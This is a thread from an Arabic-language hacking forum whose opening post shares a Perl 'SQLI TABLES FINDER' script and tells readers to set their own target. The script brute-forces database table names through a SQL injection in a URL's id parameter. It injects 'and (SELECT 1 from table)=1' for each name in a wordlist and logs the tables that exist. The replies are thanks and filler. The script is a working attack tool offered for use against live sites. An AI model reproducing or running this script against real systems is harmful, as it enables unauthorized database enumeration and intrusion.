:: vBspiders Professional Network ::

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   برمجة السكربتات (http://www.vbspiders.com/vb/f423.html)
-   -   SQLI TABLES FINDER (http://www.vbspiders.com/vb/t74679.html)

L3issabaNet 04-23-2018 01:34 AM

SQLI TABLES FINDER
 
السلام عليكم ورحمة الله

لمحبي الحقن اليدوي

طريقة للتخمين على التايبلز

بالتوفيق

كود:

    use strict;
    use warnings;
    use LWP::UserAgent;
    use HTTP::Request::Common;
   
    system('cls');
print '
  ____      _____    _____ 
 / __"| u  |_ " _|  |" ___|
<\___ \/      | |    U| |_  u
 u___) |    /| |\  \|  _|/ 
 |____/>>  u |_|U    |_|   
  )(  (__)  _// \\_  )(\\,- 
 (__)      (__) (__) (__)(_/ 
';
print "\n Sql tables Finder\n";
   
    print "List Of tables -> ";
    my $tables = <STDIN>;
    chomp($tables);
    open (TABLESFILE, "<$tables") || die "[-] Can't Found ($tables) !";
    my @tables = <TABLESFILE>;
    close TABLESFILE;
    system('clear');
    system('cls');
    print "Cracking Now !...\n";

        foreach my $table (@tables) {
        chomp $table;
                my $UserAgent = LWP::UserAgent->new;
                my $sql = "https://www.site.com/path/-id and (SELECT 1 from $table )=1"; #change to your targer
                my $request = HTTP::Request->new(GET => $sql);
                my $reponse = $UserAgent->request($request);
                #print $sql;
                if ($reponse->content =~m/SQL/) { #change to your specific string
                    print "Table doesn't exist => ($table)\n";
                }
                else{
                    print " Table exist => ($table)\n";
                    open(LNT,">>tables_exists.txt");
                    print LNT "$table\n";
                    close(LNT);}
    }


mimo-dz 04-23-2018 09:45 PM

رد: SQLI TABLES FINDER
 
ربنا يوفقك اخي واصل ابداعك

L3issabaNet 04-24-2018 05:31 PM

رد: SQLI TABLES FINDER
 
واياك ان شاء الله اخي
نورت الموضوع

renakjhh 10-17-2019 11:24 AM

رد: SQLI TABLES FINDER
 
1111111111111111111

enajjjh 10-17-2019 12:23 PM

رد: SQLI TABLES FINDER
 
222222222222222222

دانادانا 10-30-2019 12:38 PM

رد: SQLI TABLES FINDER
 
111111111111

ددداتاانت 01-08-2020 03:50 PM

رد: SQLI TABLES FINDER
 
55555555555555555

المسوق 02-23-2020 06:06 AM

رد: SQLI TABLES FINDER
 
السلام عليكم


الساعة الآن 01:25 AM


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0